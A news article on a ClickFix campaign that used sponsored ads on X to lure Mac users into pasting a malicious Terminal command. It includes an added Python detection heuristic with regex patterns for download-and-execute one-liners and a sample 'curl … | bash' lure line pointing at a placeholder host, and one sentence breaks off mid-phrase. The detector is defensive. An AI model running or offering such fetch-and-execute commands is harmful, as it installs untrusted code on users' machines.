Cybercriminals used social network X to spread ‘malware’ through its sponsored ads

A verified X account was unknowingly used to distribute ‘malware’ targeting Mac users through a fraudulent ad that impersonated the DynamicLake application, as part of a ‘ClickFix’ social engineering campaign that managed to bypass the platform’s controls.

Cybercriminals used a ‘ClickFix’ type attack, already perpetrated on previous occasions even against macOS devices, which is based on deceiving users, in this case by promoting an alleged version of DynamicLake, an application for Mac that simulates the iPhone’s ‘Dynamic Island’ on the screen.

This was shared by Jamf Threat Labs security researchers in a post on their X account, where they detailed that the ‘malware’ campaign was launched from a legitimate verified account with numerous followers, which allowed the ‘malware’ to be sent to thousands of X users.

As explained, the strategy consisted of redirecting users to the domain ‘dynamicmacisland.com’, very similar to that of the original ‘app’ for Mac, where they were instructed to open the Terminal and execute an installation command, when in reality the objective was to introduce a malicious agent into the victim’s computer. This is the classic technique that defines social engineering attacks known as ‘ClickFix’.

This is not the first time that malicious actors have used ‘apps’ of this type, related to the Dynamic Island functionality, as decoys in malware campaigns for macOS, as the security firm notes in its publication on

The problem with this attack is that it comes from a verified account, whose name has not been shared to preserve the owner’s anonymity, because the owner never intended to spread malware through the paid ads. From the looks of it, the owner trusted the advertisement and approved it for his account, believing at all times that it was totally legitimate, without knowing that there was a malicious domain behind it.

The cybercriminals were able to circumvent the X system responsible for automatically scanning ads by linking to a domain very similar to the real one.
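The lure described above (a landing page on a lookalike domain that tells the visitor to open the Terminal and run an "installation" command) can be expressed as a simple landing-page review heuristic. This is an added example, not code from Jamf, X or the original article; the trusted host, the page wording and the command are constructed placeholders, and the regular expressions are assumptions about how such pages are typically phrased.

```python
import re

# Wording that tells the visitor to open a shell and paste something (assumed phrasing).
INSTRUCTION = re.compile(
    r"\b(open|launch)\s+(the\s+)?terminal\b|\bpaste\b.{0,40}\b(command|terminal)\b",
    re.I | re.S,
)

# One-liners that fetch remote content and execute it in the same step.
EXEC_PATTERNS = {
    "download piped to shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I),
    "shell -c with command-substituted download": re.compile(
        r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b", re.I),
    "base64 decoded into shell": re.compile(
        r"\bbase64\s+(-d|--decode)\b[^\n|]*\|\s*(ba|z)?sh\b", re.I),
}


def review_landing_page(host, page_text, trusted_hosts):
    """Return the sorted reasons a landing page looks like a ClickFix lure.

    A page is flagged only when it is served from a host outside the
    advertiser's trusted set AND it both instructs the visitor to use the
    Terminal and shows a download-and-execute one-liner.
    """
    host = host.lower().rstrip(".")
    if host in {h.lower() for h in trusted_hosts}:
        return []
    if not INSTRUCTION.search(page_text):
        return []
    return sorted(name for name, rx in EXEC_PATTERNS.items() if rx.search(page_text))


# Constructed sample input: the wording and the command are placeholders.
TRUSTED = {"official-vendor.example"}
LURE = ("To install, open Terminal and paste the command below:\n"
        "curl -fsSL https://example.invalid/install.sh | bash\n")
BENIGN = "Download the disk image and drag the app into Applications.\n"

if __name__ == "__main__":
    print(review_landing_page("dynamicmacisland.com", LURE, TRUSTED))
    print(review_landing_page("official-vendor.example", LURE, TRUSTED))
    print(review_landing_page("dynamicmacisland.com", BENIGN, TRUSTED))
```

The trusted-host check matters because legitimate developer tools also publish paste-in-Terminal installers; the signal is the combination of that pattern with a host the advertiser does not control.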

It is not the first time this has happened in the advertising industry: according to the digital outlet 9to5Mac, Google Ads had to face a similar problem when it approved fake ads for the Homebrew tool that were used to infect Mac users.

By Editor